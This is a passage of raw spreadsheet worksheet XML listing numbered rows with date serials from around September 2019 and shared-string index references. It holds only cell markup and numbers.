        <v>20694</v>
      </c>
      <c r="F10821" t="s">
        <v>10526</v>
      </c>
      <c r="G10821" t="s">
        <v>20695</v>
      </c>
    </row>
    <row r="10822" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10822">
        <f t="shared" si="169"/>
        <v>10821</v>
      </c>
      <c r="B10822">
        <v>821</v>
      </c>
      <c r="C10822" t="s">
        <v>19637</v>
      </c>
      <c r="D10822" s="1">
        <v>43708</v>
      </c>
      <c r="E10822" t="s">
        <v>20696</v>
      </c>
      <c r="F10822" t="s">
        <v>9975</v>
      </c>
      <c r="G10822" t="s">
        <v>20697</v>
      </c>
    </row>
    <row r="10823" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10823">
        <f t="shared" si="169"/>
        <v>10822</v>
      </c>
      <c r="B10823">
        <v>822</v>
      </c>
      <c r="C10823" t="s">
        <v>19637</v>
      </c>
      <c r="D10823" s="1">
        <v>43711</v>
      </c>
      <c r="F10823" t="s">
        <v>10526</v>
      </c>
      <c r="G10823" t="s">
        <v>20698</v>
      </c>
    </row>
    <row r="10824" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10824">
        <f t="shared" si="169"/>
        <v>10823</v>
      </c>
      <c r="B10824">
        <v>823</v>
      </c>
      <c r="C10824" t="s">
        <v>19637</v>
      </c>
      <c r="D10824" s="1">
        <v>43736</v>
      </c>
      <c r="E10824" t="s">
        <v>19705</v>
      </c>
      <c r="F10824" t="s">
        <v>10021</v>
      </c>
      <c r="G10824" t="s">
        <v>20699</v>
      </c>
    </row>
    <row r="10825" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10825">
        <f t="shared" si="169"/>
        <v>10824</v>
      </c>
      <c r="B10825">
        <v>824</v>
      </c>
      <c r="C10825" t="s">
        <v>19637</v>
      </c>
      <c r="D10825" s="1">
        <v>43718</v>
      </c>
      <c r="E10825" t="s">
        <v>20700</v>
      </c>
      <c r="F10825" t="s">
        <v>10021</v>
      </c>
      <c r="G10825" t="s">
        <v>20701</v>
      </c>
    </row>
    <row r="10826" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10826">
        <f t="shared" si="169"/>
        <v>10825</v>
      </c>
      <c r="B10826">
        <v>825</v>
      </c>
      <c r="C10826" t="s">
        <v>19637</v>
      </c>
      <c r="D10826" s="1">
        <v>43714</v>
      </c>
      <c r="E10826" t="s">
        <v>19663</v>
      </c>
      <c r="F10826" t="s">
        <v>9975</v>
      </c>
      <c r="G10826" t="s">
        <v>20702</v>
      </c>
    </row>
    <row r="10827" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10827">
        <f t="shared" si="169"/>
        <v>10826</v>
      </c>
      <c r="B10827">
        <v>826</v>
      </c>
      <c r="C10827" t="s">
        <v>19637</v>
      </c>
      <c r="D10827" s="1">
        <v>43732</v>
      </c>
      <c r="E10827" t="s">
        <v>19640</v>
      </c>
      <c r="F10827" t="s">
        <v>10021</v>
      </c>
      <c r="G10827" t="s">
        <v>20703</v>
      </c>
    </row>
    <row r="10828" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10828">
        <f t="shared" si="169"/>
        <v>10827</v>
      </c>
      <c r="B10828">
        <v>827</v>
      </c>
      <c r="C10828" t="s">
        <v>19637</v>
      </c>
      <c r="D10828" s="1">
        <v>43719</v>
      </c>
      <c r="E10828" t="s">
        <v>20704</v>
      </c>
      <c r="F10828" t="s">
        <v>10526</v>
      </c>
      <c r="G10828" t="s">
        <v>20705</v>
      </c>
    </row>
    <row r="10829" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10829">
        <f t="shared" si="169"/>
        <v>10828</v>
      </c>
      <c r="B10829">
        <v>828</v>
      </c>
      <c r="C10829" t="s">
        <v>19637</v>
      </c>
      <c r="D10829" s="1">
        <v>43710</v>
      </c>
      <c r="F10829" t="s">
        <v>10526</v>
      </c>
      <c r="G10829" t="s">
        <v>20706</v>
      </c>
    </row>
    <row r="10830" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10830">
        <f t="shared" si="169"/>
        <v>10829</v>
      </c>
      <c r="B10830">
        <v>829</v>
      </c>
      <c r="C10830" t="s">
        <v>19637</v>
      </c>
      <c r="D10830" s="1">
        <v>43715</v>
      </c>
      <c r="F10830" t="s">
        <v>10021</v>
      </c>
      <c r="G10830" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="10831" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10831">
        <f t="shared" si="169"/>
        <v>10830</v>
      </c>
      <c r="B10831">
        <v>830</v>
      </c>
      <c r="C10831" t="s">
        <v>19637</v>
      </c>
      <c r="D10831" s="1">
        <v>43713</v>
      </c>
      <c r="E10831" t="s">
        <v>20707</v>
      </c>
      <c r="F10831" t="s">
        <v>10526</v>
      </c>
      <c r="G10831" t="s">
        <v>20708</v>
      </c>
    </row>
    <row r="10832" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10832">
        <f t="shared" si="169"/>
        <v>10831</v>
      </c>
      <c r="B10832">
        <v>831</v>
      </c>
      <c r="C10832" t="s">
        <v>19637</v>
      </c>
      <c r="D10832" s="1">
        <v>43727</v>
      </c>
      <c r="E10832" t="s">
        <v>20458</v>
      </c>
      <c r="F10832" t="s">
        <v>9978</v>
      </c>
      <c r="G10832" t="s">
        <v>20709</v>
      </c>
    </row>
    <row r="10833" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10833">
        <f t="shared" si="169"/>
        <v>10832</v>
      </c>
      <c r="B10833">
        <v>832</v>
      </c>
      <c r="C10833" t="s">
        <v>19637</v>
      </c>
      <c r="D10833" s="1">
        <v>43735</v>
      </c>
      <c r="E10833" t="s">
        <v>19650</v>
      </c>
      <c r="F10833" t="s">
        <v>10021</v>
      </c>
      <c r="G10833" t="s">
        <v>20710</v>
      </c>
    </row>
    <row r="10834" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10834">
        <f t="shared" si="169"/>
        <v>10833</v>
      </c>
      <c r="B10834">
        <v>833</v>
      </c>
      <c r="C10834" t="s">
        <v>19637</v>
      </c>
      <c r="D10834" s="1">
        <v>43733</v>
      </c>
      <c r="F10834" t="s">
        <v>10526</v>
      </c>
      <c r="G10834" t="s">
        <v>20711</v>
      </c>
    </row>
    <row r="10835" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10835">
        <f t="shared" si="169"/>
        <v>10834</v>
      </c>
      <c r="B10835">
        <v>834</v>
      </c>
      <c r="C10835" t="s">
        <v>19637</v>
      </c>
      <c r="D10835" s="1">
        <v>43726</v>
      </c>
      <c r="E10835" t="s">
        <v>20712</v>
      </c>
      <c r="F10835" t="s">
        <v>10526</v>
      </c>
      <c r="G10835" t="s">
        <v>20249</v>
      </c>
    </row>
    <row r="10836" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10836">
        <f t="shared" si="169"/>
        <v>10835</v>
      </c>
      <c r="B10836">
        <v>835</v>
      </c>
      <c r="C10836" t="s">
        <v>19637</v>
      </c>
      <c r="D10836" s="1">
        <v>43733</v>
      </c>
      <c r="F10836" t="s">
        <v>10526</v>
      </c>
      <c r="G10836" t="s">
        <v>20713</v>
      </c>
    </row>
    <row r="10837" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10837">
        <f t="shared" si="169"/>
        <v>10836</v>
      </c>
      <c r="B10837">
        <v>836</v>
      </c>
      <c r="C10837" t="s">
        <v>19637</v>
      </c>
      <c r="D10837" s="1">
        <v>43723</v>
      </c>
      <c r="F10837" t="s">
        <v>10526</v>
      </c>
      <c r="G10837" t="s">
        <v>20714</v>
      </c>
    </row>
    <row r="10838" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10838">
        <f t="shared" si="169"/>
        <v>10837</v>
      </c>
      <c r="B10838">
        <v>837</v>
      </c>
      <c r="C10838" t="s">
        <v>19637</v>
      </c>
      <c r="D10838" s="1">
        <v>43736</v>
      </c>
      <c r="E10838" t="s">
        <v>19640</v>
      </c>
      <c r="F10838" t="s">
        <v>9975</v>
      </c>
      <c r="G10838" t="s">
        <v>20715</v>
      </c>
    </row>
    <row r="10839" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10839">
        <f t="shared" si="169"/>
        <v>10838</v>
      </c>
      <c r="B10839">
        <v>838</v>
      </c>
      <c r="C10839" t="s">
        <v>19637</v>
      </c>
      <c r="D10839" s="1">
        <v>43734</v>
      </c>
      <c r="E10839" t="s">
        <v>19860</v>
      </c>
      <c r="F10839" t="s">
        <v>10526</v>
      </c>
      <c r="G10839" t="s">
        <v>20716</v>
      </c>
    </row>
    <row r="10840" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10840">
        <f t="shared" si="169"/>
        <v>10839</v>
      </c>
      <c r="B10840">
        <v>839</v>
      </c>
      <c r="C10840" t="s">
        <v>19637</v>
      </c>
      <c r="D10840" s="1">
        <v>43738</v>
      </c>
      <c r="E10840" t="s">
        <v>20717</v>
      </c>
      <c r="F10840" t="s">
        <v>10021</v>
      </c>
      <c r="G10840" t="s">
        <v>20718</v>
      </c>
    </row>
    <row r="10841" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10841">
        <f t="shared" si="169"/>
        <v>10840</v>
      </c>
      <c r="B10841">
        <v>840</v>
      </c>
      <c r="C10841" t="s">
        <v>19637</v>
      </c>
      <c r="D10841" s="1">
        <v>43724</v>
      </c>
      <c r="E10841" t="s">
        <v>20719</v>
      </c>
      <c r="F10841" t="s">
        <v>10021</v>
      </c>
      <c r="G10841" t="s">
        <v>20720</v>
      </c>
    </row>
    <row r="10842" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10842">
        <f t="shared" si="169"/>
        <v>10841</v>
      </c>
      <c r="B10842">
        <v>841</v>
      </c>
      <c r="C10842" t="s">
        <v>19637</v>
      </c>
      <c r="D10842" s="1">
        <v>43732</v>
      </c>
      <c r="E10842" t="s">
        <v>19640</v>
      </c>
      <c r="F10842" t="s">
        <v>9975</v>
      </c>
      <c r="G10842" t="s">
        <v>20721</v>
      </c>
    </row>
    <row r="10843" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10843">
        <f t="shared" si="169"/>
        <v>10842</v>
      </c>
      <c r="B10843">
        <v>842</v>
      </c>
      <c r="C10843" t="s">
        <v>19637</v>
      </c>
      <c r="D10843" s="1">
        <v>43724</v>
      </c>
      <c r="E10843" t="s">
        <v>19690</v>
      </c>
      <c r="F10843" t="s">
        <v>9978</v>
      </c>
      <c r="G10843" t="s">
        <v>20722</v>
      </c>
    </row>
    <row r="10844" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10844">
        <f t="shared" si="169"/>
        <v>10843</v>
      </c>
      <c r="B10844">
        <v>843</v>
      </c>
      <c r="C10844" t="s">
        <v>19637</v>
      </c>
      <c r="D10844" s="1">
        <v>43726</v>
      </c>
      <c r="E10844" t="s">
        <v>19974</v>
      </c>
      <c r="F10844" t="s">
        <v>9978</v>
      </c>
      <c r="G10844" t="s">
        <v>20723</v>
      </c>
    </row>
    <row r="10845" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10845">
        <f t="shared" si="169"/>
        <v>10844</v>
      </c>
      <c r="B10845">
        <v>844</v>
      </c>
      <c r="C10845" t="s">
        <v>19637</v>
      </c>
      <c r="D10845" s="1">
        <v>43730</v>
      </c>
      <c r="E10845" t="s">
        <v>20724</v>
      </c>
      <c r="F10845" t="s">
        <v>9978</v>
      </c>
      <c r="G10845" t="s">
        <v>20725</v>
      </c>
    </row>
    <row r="10846" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10846">
        <f t="shared" si="169"/>
        <v>10845</v>
      </c>
      <c r="B10846">
        <v>845</v>
      </c>
      <c r="C10846" t="s">
        <v>19637</v>
      </c>
      <c r="D10846" s="1">
        <v>43721</v>
      </c>
      <c r="E10846" t="s">
        <v>20726</v>
      </c>
      <c r="F10846" t="s">
        <v>10021</v>
      </c>
      <c r="G10846" t="s">
        <v>20727</v>
      </c>
    </row>
    <row r="10847" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10847">
        <f t="shared" si="169"/>
        <v>10846</v>
      </c>
      <c r="B10847">
        <v>846</v>
      </c>
      <c r="C10847" t="s">
        <v>19637</v>
      </c>
      <c r="D10847" s="1">
        <v>43737</v>
      </c>
      <c r="E10847" t="s">
        <v>19668</v>
      </c>
      <c r="F10847" t="s">
        <v>9978</v>
      </c>
      <c r="G10847" t="s">
        <v>20728</v>
      </c>
    </row>
    <row r="10848" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10848">
        <f t="shared" si="169"/>
        <v>10847</v>
      </c>
      <c r="B10848">
        <v>847</v>
      </c>
      <c r="C10848" t="s">
        <v>19637</v>
      </c>
      <c r="D10848" s="1">
        <v>43710</v>
      </c>
      <c r="F10848" t="s">
        <v>10526</v>
      </c>
      <c r="G10848" t="s">
        <v>20729</v>
      </c>
    </row>
    <row r="10849" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10849">
        <f t="shared" si="169"/>
        <v>10848</v>
      </c>
      <c r="B10849">
        <v>848</v>
      </c>
      <c r="C10849" t="s">
        <v>19637</v>
      </c>
      <c r="D10849" s="1">
        <v>43730</v>
      </c>
      <c r="F10849" t="s">
        <v>10526</v>
      </c>
      <c r="G10849" t="s">
        <v>20730</v>
      </c>
    </row>
    <row r="10850" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10850">
        <f t="shared" si="169"/>
        <v>10849</v>
      </c>
      <c r="B10850">
        <v>849</v>
      </c>
      <c r="C10850" t="s">
        <v>19637</v>
      </c>
      <c r="D10850" s="1">
        <v>43737</v>
      </c>
      <c r="F10850" t="s">
        <v>10526</v>
      </c>
      <c r="G10850" t="s">
        <v>20731</v>
      </c>
    </row>
    <row r="10851" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10851">
        <f t="shared" si="169"/>
        <v>10850</v>
      </c>
      <c r="B10851">
        <v>850</v>
      </c>
      <c r="C10851" t="s">
        <v>19637</v>
      </c>
      <c r="D10851" s="1">
        <v>43709</v>
      </c>
      <c r="E10851" t="s">
        <v>20732</v>
      </c>
      <c r="F10851" t="s">
        <v>10021</v>
      </c>
      <c r="G10851" t="s">
        <v>20733</v>
      </c>
    </row>
    <row r="10852" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10852">
        <f t="shared" si="169"/>
        <v>10851</v>
      </c>
      <c r="B10852">
        <v>851</v>
      </c>
      <c r="C10852" t="s">
        <v>19637</v>
      </c>
      <c r="D10852" s="1">
        <v>43726</v>
      </c>
      <c r="E10852" t="s">
        <v>19680</v>
      </c>
      <c r="F10852" t="s">
        <v>10021</v>
      </c>
      <c r="G10852" t="s">
        <v>20734</v>
      </c>
    </row>
    <row r="10853" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10853">
        <f t="shared" si="169"/>
        <v>10852</v>
      </c>
      <c r="B10853">
        <v>852</v>
      </c>
      <c r="C10853" t="s">
        <v>19637</v>
      </c>
      <c r="D10853" s="1">
        <v>43725</v>
      </c>
      <c r="E10853" t="s">
        <v>20735</v>
      </c>
      <c r="F10853" t="s">
        <v>9978</v>
      </c>
      <c r="G10853" t="s">
        <v>20736</v>
      </c>
    </row>
    <row r="10854" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10854">
        <f t="shared" si="169"/>
        <v>10853</v>
      </c>
      <c r="B10854">
        <v>853</v>
      </c>
      <c r="C10854" t="s">
        <v>19637</v>
      </c>
      <c r="D10854" s="1">
        <v>43713</v>
      </c>
      <c r="E10854" t="s">
        <v>20185</v>
      </c>
      <c r="F10854" t="s">
        <v>9975</v>
      </c>
      <c r="G10854" t="s">
        <v>20737</v>
      </c>
    </row>
    <row r="10855" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10855">
        <f t="shared" si="169"/>
        <v>10854</v>
      </c>
      <c r="B10855">
        <v>854</v>
      </c>
      <c r="C10855" t="s">
        <v>19637</v>
      </c>
      <c r="D10855" s="1">
        <v>43725</v>
      </c>
      <c r="E10855" t="s">
        <v>19640</v>
      </c>
      <c r="F10855" t="s">
        <v>9975</v>
      </c>
      <c r="G10855" t="s">
        <v>20738</v>
      </c>
    </row>
    <row r="10856" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10856">
        <f t="shared" si="169"/>
        <v>10855</v>
      </c>
      <c r="B10856">
        <v>855</v>
      </c>
      <c r="C10856" t="s">
        <v>19637</v>
      </c>
      <c r="D10856" s="1">
        <v>43734</v>
      </c>
      <c r="E10856" t="s">
        <v>20739</v>
      </c>
      <c r="F10856" t="s">
        <v>10021</v>
      </c>
      <c r="G10856" t="s">
        <v>20740</v>
      </c>
    </row>
    <row r="10857" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10857">
        <f t="shared" si="169"/>
        <v>10856</v>
      </c>
      <c r="B10857">
        <v>856</v>
      </c>
      <c r="C10857" t="s">
        <v>19637</v>
      </c>
      <c r="D10857" s="1">
        <v>43712</v>
      </c>
      <c r="E10857" t="s">
        <v>19680</v>
      </c>
      <c r="F10857" t="s">
        <v>10021</v>
      </c>
      <c r="G10857" t="s">
        <v>20741</v>
      </c>
    </row>
    <row r="10858" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10858">
        <f t="shared" si="169"/>
        <v>10857</v>
      </c>
      <c r="B10858">
        <v>857</v>
      </c>
      <c r="C10858" t="s">
        <v>19637</v>
      </c>
      <c r="D10858" s="1">
        <v>43710</v>
      </c>
      <c r="F10858" t="s">
        <v>10526</v>
      </c>
      <c r="G10858" t="s">
        <v>20742</v>
      </c>
    </row>
    <row r="10859" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10859">
        <f t="shared" si="169"/>
        <v>10858</v>
      </c>
      <c r="B10859">
        <v>858</v>
      </c>
      <c r="C10859" t="s">
        <v>19637</v>
      </c>
      <c r="D10859" s="1">
        <v>43711</v>
      </c>
      <c r="E10859" t="s">
        <v>19640</v>
      </c>
      <c r="F10859" t="s">
        <v>9975</v>
      </c>
      <c r="G10859" t="s">
        <v>20743</v>
      </c>
    </row>
    <row r="10860" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10860">
        <f t="shared" si="169"/>
        <v>10859</v>
      </c>
      <c r="B10860">
        <v>859</v>
      </c>
      <c r="C10860" t="s">
        <v>19637</v>
      </c>
      <c r="D10860" s="1">
        <v>43735</v>
      </c>
      <c r="E10860" t="s">
        <v>19902</v>
      </c>
      <c r="F10860" t="s">
        <v>9975</v>
      </c>
      <c r="G10860" t="s">
        <v>20744</v>
      </c>
    </row>
    <row r="10861" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10861">
        <f t="shared" si="169"/>
        <v>10860</v>
      </c>
      <c r="B10861">
        <v>860</v>
      </c>
      <c r="C10861" t="s">
        <v>19637</v>
      </c>
      <c r="D10861" s="1">
        <v>43709</v>
      </c>
      <c r="E10861" t="s">
        <v>20745</v>
      </c>
      <c r="F10861" t="s">
        <v>10526</v>
      </c>
      <c r="G10861" t="s">
        <v>20746</v>
      </c>
    </row>
    <row r="10862" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10862">
        <f t="shared" si="169"/>
        <v>10861</v>
      </c>
      <c r="B10862">
        <v>861</v>
      </c>
      <c r="C10862" t="s">
        <v>19637</v>
      </c>
      <c r="D10862" s="1">
        <v>43729</v>
      </c>
      <c r="F10862" t="s">
        <v>10021</v>
      </c>
      <c r="G10862" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="10863" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10863">
        <f t="shared" si="169"/>
        <v>10862</v>
      </c>
      <c r="B10863">
        <v>862</v>
      </c>
      <c r="C10863" t="s">
        <v>19637</v>
      </c>
      <c r="D10863" s="1">
        <v>43714</v>
      </c>
      <c r="E10863" t="s">
        <v>20747</v>
      </c>
      <c r="F10863" t="s">
        <v>10021</v>
      </c>
      <c r="G10863" t="s">
        <v>20748</v>
      </c>
    </row>
    <row r="10864" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10864">
        <f t="shared" si="169"/>
        <v>10863</v>
      </c>
      <c r="B10864">
        <v>863</v>
      </c>
      <c r="C10864" t="s">
        <v>19637</v>
      </c>
      <c r="D10864" s="1">
        <v>43736</v>
      </c>
      <c r="F10864" t="s">
        <v>9975</v>
      </c>
      <c r="G10864" t="s">
        <v>20749</v>
      </c>
    </row>
    <row r="10865" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10865">
        <f t="shared" si="169"/>
        <v>10864</v>
      </c>
      <c r="B10865">
        <v>864</v>
      </c>
      <c r="C10865" t="s">
        <v>19637</v>
      </c>
      <c r="D10865" s="1">
        <v>43731</v>
      </c>
      <c r="E10865" t="s">
        <v>19640</v>
      </c>
      <c r="F10865" t="s">
        <v>9975</v>
      </c>
      <c r="G10865" t="s">
        <v>20750</v>
      </c>
    </row>
    <row r="10866" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10866">
        <f t="shared" si="169"/>
        <v>10865</v>
      </c>
      <c r="B10866">
        <v>865</v>
      </c>
      <c r="C10866" t="s">
        <v>19637</v>
      </c>
      <c r="D10866" s="1">
        <v>43738</v>
      </c>
      <c r="E10866" t="s">
        <v>20751</v>
      </c>
      <c r="F10866" t="s">
        <v>10021</v>
      </c>
      <c r="G10866" t="s">
        <v>20752</v>
      </c>
    </row>
    <row r="10867" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10867">
        <f t="shared" si="169"/>
        <v>10866</v>
      </c>
      <c r="B10867">
        <v>866</v>
      </c>
      <c r="C10867" t="s">
        <v>19637</v>
      </c>
      <c r="D10867" s="1">
        <v>43737</v>
      </c>
      <c r="E10867" t="s">
        <v>19917</v>
      </c>
      <c r="F10867" t="s">
        <v>9975</v>
      </c>
      <c r="G10867" t="s">
        <v>20753</v>
      </c>
    </row>
    <row r="10868" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10868">
        <f t="shared" si="169"/>
        <v>10867</v>
      </c>
      <c r="B10868">
        <v>867</v>
      </c>
      <c r="C10868" t="s">
        <v>19637</v>
      </c>
      <c r="D10868" s="1">
        <v>43717</v>
      </c>
      <c r="E10868" t="s">
        <v>19687</v>
      </c>
      <c r="F10868" t="s">
        <v>10021</v>
      </c>
      <c r="G10868" t="s">
        <v>20754</v>
      </c>
    </row>
    <row r="10869" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10869">
        <f t="shared" si="169"/>
        <v>10868</v>
      </c>
      <c r="B10869">
        <v>868</v>
      </c>
      <c r="C10869" t="s">
        <v>19637</v>
      </c>
      <c r="D10869" s="1">
        <v>43719</v>
      </c>
      <c r="E10869" t="s">
        <v>20755</v>
      </c>
      <c r="F10869" t="s">
        <v>10526</v>
      </c>
      <c r="G10869" t="s">
        <v>20756</v>
      </c>
    </row>
    <row r="10870" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10870">
        <f t="shared" si="169"/>
        <v>10869</v>
      </c>
      <c r="B10870">
        <v>869</v>
      </c>
      <c r="C10870" t="s">
        <v>19637</v>
      </c>
      <c r="D10870" s="1">
        <v>43717</v>
      </c>
      <c r="E10870" t="s">
        <v>20757</v>
      </c>
      <c r="F10870" t="s">
        <v>9978</v>
      </c>
      <c r="G10870" t="s">
        <v>20758</v>
      </c>
    </row>
    <row r="10871" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10871">
        <f t="shared" si="169"/>
        <v>10870</v>
      </c>
      <c r="B10871">
        <v>870</v>
      </c>
      <c r="C10871" t="s">
        <v>19637</v>
      </c>
      <c r="D10871" s="1">
        <v>43720</v>
      </c>
      <c r="E10871" t="s">
        <v>20185</v>
      </c>
      <c r="F10871" t="s">
        <v>9975</v>
      </c>
      <c r="G10871" t="s">
        <v>20759</v>
      </c>
    </row>
    <row r="10872" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10872">
        <f t="shared" si="169"/>
        <v>10871</v>
      </c>
      <c r="B10872">
        <v>871</v>
      </c>
      <c r="C10872" t="s">
        <v>19637</v>
      </c>
      <c r="D10872" s="1">
        <v>43735</v>
      </c>
      <c r="E10872" t="s">
        <v>19645</v>
      </c>
      <c r="F10872" t="s">
        <v>9975</v>
      </c>
      <c r="G10872" t="s">
        <v>20760</v>
      </c>
    </row>
    <row r="10873" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10873">
        <f t="shared" si="169"/>
        <v>10872</v>
      </c>
      <c r="B10873">
        <v>872</v>
      </c>
      <c r="C10873" t="s">
        <v>19637</v>
      </c>
      <c r="D10873" s="1">
        <v>43712</v>
      </c>
      <c r="E10873" t="s">
        <v>19640</v>
      </c>
      <c r="F10873" t="s">
        <v>9975</v>
      </c>
      <c r="G10873" t="s">
        <v>20761</v>
      </c>
    </row>
    <row r="10874" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10874">
        <f t="shared" si="169"/>
        <v>10873</v>
      </c>
      <c r="B10874">
        <v>873</v>
      </c>
      <c r="C10874" t="s">
        <v>19637</v>
      </c>
      <c r="D10874" s="1">
        <v>43716</v>
      </c>
      <c r="F10874" t="s">
        <v>10526</v>
      </c>
      <c r="G10874" t="s">
        <v>20762</v>
      </c>
    </row>
    <row r="10875" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10875">
        <f t="shared" si="169"/>
        <v>10874</v>
      </c>
      <c r="B10875">
        <v>874</v>
      </c>
      <c r="C10875" t="s">
        <v>19637</v>
      </c>
      <c r="D10875" s="1">
        <v>43728</v>
      </c>
      <c r="E10875" t="s">
        <v>19725</v>
      </c>
      <c r="F10875" t="s">
        <v>9978</v>
      </c>
      <c r="G10875" t="s">
        <v>20763</v>
      </c>
    </row>
    <row r="10876" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10876">
        <f t="shared" si="169"/>
        <v>10875</v>
      </c>
      <c r="B10876">
        <v>875</v>
      </c>
      <c r="C10876" t="s">
        <v>19637</v>
      </c>
      <c r="D10876" s="1">
        <v>43721</v>
      </c>
      <c r="E10876" t="s">
        <v>19687</v>
      </c>
      <c r="F10876" t="s">
        <v>10021</v>
      </c>
      <c r="G10876" t="s">
        <v>20764</v>
      </c>
    </row>
    <row r="10877" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10877">
        <f t="shared" si="169"/>
        <v>10876</v>
      </c>
      <c r="B10877">
        <v>876</v>
      </c>
      <c r="C10877" t="s">
        <v>19637</v>
      </c>
      <c r="D10877" s="1">
        <v>43736</v>
      </c>
      <c r="F10877" t="s">
        <v>10526</v>
      </c>
      <c r="G10877" t="s">
        <v>20765</v>
      </c>
    </row>
    <row r="10878" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10878">
        <f t="shared" si="169"/>
        <v>10877</v>
      </c>
      <c r="B10878">
        <v>877</v>
      </c>
      <c r="C10878" t="s">
        <v>19637</v>
      </c>
      <c r="D10878" s="1">
        <v>43709</v>
      </c>
      <c r="F10878" t="s">
        <v>10526</v>
      </c>
      <c r="G10878" t="s">
        <v>20766</v>
      </c>
    </row>
    <row r="10879" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10879">
        <f t="shared" si="169"/>
        <v>10878</v>
      </c>
      <c r="B10879">
        <v>878</v>
      </c>
      <c r="C10879" t="s">
        <v>19637</v>
      </c>
      <c r="D10879" s="1">
        <v>43711</v>
      </c>
      <c r="E10879" t="s">
        <v>20767</v>
      </c>
      <c r="F10879" t="s">
        <v>10021</v>
      </c>
      <c r="G10879" t="s">
        <v>20768</v>
      </c>
    </row>
    <row r="10880" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10880">
        <f t="shared" si="169"/>
        <v>10879</v>
      </c>
      <c r="B10880">
        <v>879</v>
      </c>
      <c r="C10880" t="s">
        <v>19637</v>
      </c>
      <c r="D10880" s="1">
        <v>43723</v>
      </c>
      <c r="F10880" t="s">
        <v>9978</v>
      </c>
      <c r="G10880" t="s">
        <v>20769</v>
      </c>
    </row>
    <row r="10881" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10881">
        <f t="shared" si="169"/>
        <v>10880</v>
      </c>
      <c r="B10881">
        <v>880</v>
      </c>
      <c r="C10881" t="s">
        <v>19637</v>
      </c>
      <c r="D10881" s="1">
        <v>43722</v>
      </c>
      <c r="E10881" t="s">
        <v>19687</v>
      </c>
      <c r="F10881" t="s">
        <v>10021</v>
      </c>
      <c r="G10881" t="s">
        <v>20770</v>
      </c>
    </row>
    <row r="10882" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10882">
        <f t="shared" si="169"/>
        <v>10881</v>
      </c>
      <c r="B10882">
        <v>881</v>
      </c>
      <c r="C10882" t="s">
        <v>19637</v>
      </c>
      <c r="D10882" s="1">
        <v>43712</v>
      </c>
      <c r="E10882" t="s">
        <v>20021</v>
      </c>
      <c r="F10882" t="s">
        <v>10526</v>
      </c>
      <c r="G10882" t="s">
        <v>20771</v>
      </c>
    </row>
    <row r="10883" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10883">
        <f t="shared" ref="A10883:A10946" si="170">+ROW(A10882)</f>
        <v>10882</v>
      </c>
      <c r="B10883">
        <v>882</v>
      </c>
      <c r="C10883" t="s">
        <v>19637</v>
      </c>
      <c r="D10883" s="1">
        <v>43727</v>
      </c>
      <c r="E10883" t="s">
        <v>20772</v>
      </c>
      <c r="F10883" t="s">
        <v>10526</v>
      </c>
      <c r="G10883" t="s">
        <v>20773</v>
      </c>
    </row>
    <row r="10884" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10884">
        <f t="shared" si="170"/>
        <v>10883</v>
      </c>
      <c r="B10884">
        <v>883</v>
      </c>
      <c r="C10884" t="s">
        <v>19637</v>
      </c>
      <c r="D10884" s="1">
        <v>43717</v>
      </c>
      <c r="E10884" t="s">
